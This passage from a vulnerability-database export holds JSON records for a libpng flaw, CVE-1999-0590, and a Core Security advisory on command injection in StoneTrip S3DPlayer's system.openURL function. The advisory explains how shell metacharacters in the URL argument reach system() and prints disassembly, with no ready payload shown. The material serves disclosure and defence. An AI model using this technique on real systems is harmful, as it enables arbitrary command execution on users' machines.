        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1ubuntu1_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.15~beta5-1ubuntu1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.15~beta5-1ubuntu1.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.15~beta5-1ubuntu1_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.2_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.com/security/signatures/"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.org/go/package/png"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.com/\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.libpng.org/pub/png/"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.com/go/openpkg-sa"
      },
      {
        "trust": 0.1,
        "url": "http://openpkg.com/openpkg.com.pgp"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "PACKETSTORM",
        "id": "68410"
      },
      {
        "db": "PACKETSTORM",
        "id": "75976"
      },
      {
        "db": "PACKETSTORM",
        "id": "57069"
      },
      {
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "db": "PACKETSTORM",
        "id": "56849"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "db": "PACKETSTORM",
        "id": "68410"
      },
      {
        "db": "PACKETSTORM",
        "id": "75976"
      },
      {
        "db": "PACKETSTORM",
        "id": "57069"
      },
      {
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "db": "PACKETSTORM",
        "id": "56849"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-05-16T00:00:00",
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "date": "2007-05-15T00:00:00",
        "db": "BID",
        "id": "24000"
      },
      {
        "date": "2007-06-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "date": "2008-07-22T17:59:59",
        "db": "PACKETSTORM",
        "id": "68410"
      },
      {
        "date": "2009-03-24T04:24:53",
        "db": "PACKETSTORM",
        "id": "75976"
      },
      {
        "date": "2007-06-07T06:18:46",
        "db": "PACKETSTORM",
        "id": "57069"
      },
      {
        "date": "2014-12-12T17:43:12",
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "date": "2007-06-13T00:51:14",
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "date": "2007-05-21T03:50:57",
        "db": "PACKETSTORM",
        "id": "56849"
      },
      {
        "date": "2007-05-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "date": "2007-05-16T22:30:00",
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-08-23T00:00:00",
        "db": "CERT/CC",
        "id": "VU#684664"
      },
      {
        "date": "2009-03-23T15:56:00",
        "db": "BID",
        "id": "24000"
      },
      {
        "date": "2009-04-03T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-000397"
      },
      {
        "date": "2009-03-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      },
      {
        "date": "2018-10-16T16:43:36.383000",
        "db": "NVD",
        "id": "CVE-2007-2445"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "129524"
      },
      {
        "db": "PACKETSTORM",
        "id": "57151"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      }
    ],
    "trust": 0.8
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Libpng Library Remote Denial of Service Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "24000"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200705-347"
      }
    ],
    "trust": 0.9
  }
}

var-200006-0001
Vulnerability from variot

A system does not present an appropriate legal message or warning to a user who is accessing it. kernel is prone to a remote security vulnerability. Attackers can exploit this issue to perform unauthorized actions. This may aid in further attacks

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200006-0001",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "windows 95",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 98",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": "*"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "mac os",
        "scope": null,
        "trust": 0.6,
        "vendor": "apple",
        "version": null
      },
      {
        "model": "windows nt sp5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "windows nt sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "windows nt sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "windows nt sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "86235"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:3.5.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:3.5.1:sp1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:3.5.1:sp5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_2000:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:3.5.1:sp3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:3.5.1:sp2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_95:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "86235"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-1999-0590",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-573",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-1999-0590",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200006-007",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-573",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A system does not present an appropriate legal message or warning to a user who is accessing it. kernel is prone to a remote security vulnerability. \nAttackers can exploit this issue to perform unauthorized actions. This may aid in further attacks",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "BID",
        "id": "86235"
      },
      {
        "db": "VULHUB",
        "id": "VHN-573"
      }
    ],
    "trust": 1.26
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-1999-0590",
        "trust": 2.0
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "86235",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-573",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "db": "BID",
        "id": "86235"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "id": "VAR-200006-0001",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-573"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:24:50.288000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://ciac.llnl.gov/ciac/bulletins/j-043.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "db": "BID",
        "id": "86235"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "db": "BID",
        "id": "86235"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2000-06-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "date": "2000-06-01T00:00:00",
        "db": "BID",
        "id": "86235"
      },
      {
        "date": "2000-06-01T04:00:00",
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "date": "2000-06-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-09-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-573"
      },
      {
        "date": "2000-06-01T00:00:00",
        "db": "BID",
        "id": "86235"
      },
      {
        "date": "2022-08-17T06:15:18.167000",
        "db": "NVD",
        "id": "CVE-1999-0590"
      },
      {
        "date": "2022-08-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Apple macOS Security hole",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200006-007"
      }
    ],
    "trust": 0.6
  }
}

var-200905-0330
Vulnerability from variot

The system.openURL function in StoneTrip Ston3D StandalonePlayer (aka S3DPlayer StandAlone) 1.6.2.4 and 1.7.0.1 and WebPlayer (aka S3DPlayer Web) 1.6.0.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the first argument (the sURL argument). S3DPlayer Web and Standalone are prone to a remote command-injection vulnerability because they fail to adequately sanitize user-supplied input data. Attackers can exploit this issue to execute arbitrary commands within the context of the affected application. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
       http://www.coresecurity.com/corelabs/

   StoneTrip S3DPlayers remote command injection
  1. Advisory Information

Title: StoneTrip S3DPlayers remote command injection Advisory ID: CORE-2009-0401 Advisory URL: http://www.coresecurity.com/content/StoneTrip-S3DPlayers Date published: 2009-05-28 Date of last update: 2009-05-28 Vendors contacted: StoneTrip Release mode: User release

  1. Vulnerability Information

Class: Command injection, Client side Remotely Exploitable: Yes Locally Exploitable: No Bugtraq ID: 35105 CVE Name: CVE-2009-1792

  1. Vulnerability Description

Ston3D is a cross-platform technology developed by StoneTrip [1], allowing applications developed with ShiVa product [2] to be run from various media. It is a platform for 3D real time development, specially designed to make games and other real time applications.

Ston3D players come in two flavors:

  1. Ston3D StandalonePlayer [3],
  2. and Ston3D WebPlayer [4], which runs like an extension or plug-in within most popular web browsers.

These players are vulnerable to a command injection vulnerability, which can be exploited by malicious remote attackers. The vulnerability is due to the Ston3D scripting language. It provides the function 'system.openURL()' which does not properly sanitize the input before using it.

  1. Vulnerable packages

4.1. Win32

. S3DPlayer Web v1.6.0.0 . S3DPlayer StandAlone v1.6.2.4 . S3DPlayer StandAlone v1.7.0.1

4.2. MacOS

. S3DPlayer Web v1.6.0.0 . S3DPlayer StandAlone v1.6.2.4

4.3. Linux

. S3DPlayer StandAlone v1.6.2.4

NOTE: Older versions are probably affected too, but they were not checked.

  1. Non-vulnerable packages

By the time this advisory was published, the vendor:

  1. had not released patched versions of its products,
  2. had not answered the requests made by Core Security for 3 weeks (see Section 9).

Please contact StoneTrip for a fix.

  1. Vendor Information, Solutions and Workarounds

The vendor did not provide this information. A possible mitigation action would be to enable MIME type filtering in your IDS/proxies and block S3DPlayer traffic:

/-----------

application/x-ston3d-stk - -----------/

As a workaround, vulnerable users can also avoid this flaw by disabling the Ston3D Plugin in their web browsers:

6.1. Mozilla Firefox

  1. Go to the Tools menu, and select Options...
  2. Click on the Main tab
  3. Click on the Manage Add-ons...
  4. Disable Ston3D Plugin

6.2. Safari

  1. Go to the Safari menu within Safari, and select Preferences
  2. Click on the *Security * tab
  3. Deselect Enable plug-ins

6.3. Internet Explorer

Set the kill bit for control 7508D2BB-F085-45BF-8261-167C6DF4D477 (as explained in http://support.microsoft.com/kb/240797).

Please contact StoneTrip for further information, patches and workarounds.

  1. Credits

This vulnerability was discovered and researched by Diego Juarez from Core Security Technologies.

  1. Technical Description / Proof of Concept Code

Ston3D is a cross-platform technology allowing applications developed with ShiVa product [2] to be run from various media, such as a website, CD/DVD or interactive equipment. This technology provides a scripting interface [5] based on the Lua programming language, within this interface the function 'system.openURL' is defined as follows:

/-----------

Prototype system.openURL(sURL, sTarget) --Call this function to open an URL.

  • -----------/

In the current implementation, the call 'system.openURL(sURL, sTarget)' with the parameter 'sURL' set as 'file://path/command' will ultimately execute the equivalent of calling

/----------- system("open path/command"); - -----------/

By using platform specific delimiter characters this could allow arbitrary code execution in the context of the player.

Find below the relevant code snippets from various platforms.

8.1. Windows

/-----------

.text:1000D64D test esi, esi .text:1000D64F mov eax, esi .text:1000D651 jnz short loc_1000D658 .text:1000D653 .text:1000D653 loc_1000D653: ; CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const &,Pandora::EngineCore::String const &)+1CB .text:1000D653 mov eax, offset Name .text:1000D658 .text:1000D658 loc_1000D658: ; CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const &,Pandora::EngineCore::String const &)+1D1 .text:1000D658 push 1 .text:1000D65A push offset Name ; lpDirectory .text:1000D65F push ecx ; lpParameters .text:1000D660 push eax ; lpFile .text:1000D661 push offset Operation ; "open" .text:1000D666 push 0 ; hwnd .text:1000D668 call ds:ShellExecuteA .text:1000D66E .text:1000D66E loc_1000D66E: ; CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const &,Pandora::EngineCore::String const &)+1B0 .text:1000D66E test edi, edi .text:1000D670 jbe short loc_1000D67F .text:1000D672 test esi, esi .text:1000D674 jz short loc_1000D67F .text:1000D676 add esi, 0FFFFFFFCh .text:1000D679 push esi ; Memory .text:1000D67A call ebp ; __imp_free

  • -----------/

8.2. Linux

/-----------

.text:08371334 mov [esp+5Ch+var_58], offset aOpen ; "open " .text:0837133C lea eax, [esp+5Ch+var_34] .text:08371340 mov [esp+5Ch+command], eax .text:08371343 call sub_8109FC0 .text:08371348 lea eax, [esp+5Ch+var_1C] .text:0837134C mov [esp+5Ch+var_58], eax .text:08371350 lea eax, [esp+5Ch+var_34] .text:08371354 mov [esp+5Ch+command], eax .text:08371357 call sub_8108F10 .text:0837135C lea eax, [esp+5Ch+var_34] .text:08371360 mov [esp+5Ch+command], eax .text:08371363 call sub_80DF660 .text:08371368 mov [esp+5Ch+command], eax .text:0837136B call _system .text:08371370 lea eax, [esp+5Ch+var_34] .text:08371374 mov [esp+5Ch+command], eax .text:08371377 call sub_80D92F0 .text:0837137C jmp short loc_8371398

  • -----------/

8.3. MacOSX (x86)

/-----------

__text:0005995B lea eax, (aOpen - 597ECh)[ebx] ; "open " __text:00059961 lea esi, [esp+5Ch+var_44] __text:00059965 mov [esp+5Ch+var_58], eax __text:00059969 mov [esp+5Ch+var_5C], esi __text:0005996C call __ZN7Pandora10EngineCore6StringC1EPKc ; Pandora::EngineCore::String::String(char const*) __text:00059971 mov [esp+5Ch+var_58], edi __text:00059975 mov [esp+5Ch+var_5C], esi __text:00059978 call __ZN7Pandora10EngineCore6StringpLERKS1_ __text:0005997D mov edx, [esp+5Ch+var_44] __text:00059981 test edx, edx __text:00059983 jz loc_59A5F __text:00059989 mov eax, [esp+5Ch+var_40] __text:0005998D test eax, eax __text:0005998F jz loc_59A5F __text:00059995 __text:00059995 loc_59995: ; CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const&,Pandora::EngineCore::String const&)+295 __text:00059995 mov [esp+5Ch+var_5C], eax __text:00059998 call _system __text:0005999D mov eax, [esp+5Ch+var_44] __text:000599A1 test eax, eax __text:000599A3 jnz loc_59AB2 __text:000599A9 nop dword ptr [eax+00000000h]

  • -----------/

8.4. MacOSX (PPC)

/-----------

__text:00053D6C addi %r30, %sp, 0x90+var_38 __text:00053D70 addis %r4, %r31, 0x3F __text:00053D74 addi %r4, %r4, -0x29DC __text:00053D78 mr %r3, %r30 __text:00053D7C bl __ZN7Pandora10EngineCore6StringC1EPKc # Pandora::EngineCore::String::String(char const) __text:00053D80 mr %r3, %r30 __text:00053D84 mr %r4, %r29 __text:00053D88 bl __ZN7Pandora10EngineCore6StringpLERKS1_ __text:00053D8C lwz %r0, 0x90+var_38(%sp) __text:00053D90 cmpwi cr7, %r0, 0 __text:00053D94 beq cr7, loc_53DA4 __text:00053D98 lwz %r3, 0x90+var_34(%sp) __text:00053D9C cmpwi cr7, %r3, 0 __text:00053DA0 bc 5, 4cr7+eq, loc_53DAC __text:00053DA4 __text:00053DA4 loc_53DA4: # CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const&,Pandora::EngineCore::String const&)+394 __text:00053DA4 addis %rtoc, %r31, 0x3F __text:00053DA8 addi %r3, %rtoc, -0x5620 __text:00053DAC __text:00053DAC loc_53DAC: # CODE XREF: Pandora::ClientCore::HTTPConnectionManager::OpenURL(Pandora::EngineCore::String const&,Pandora::EngineCore::String const&)+3A0 __text:00053DAC 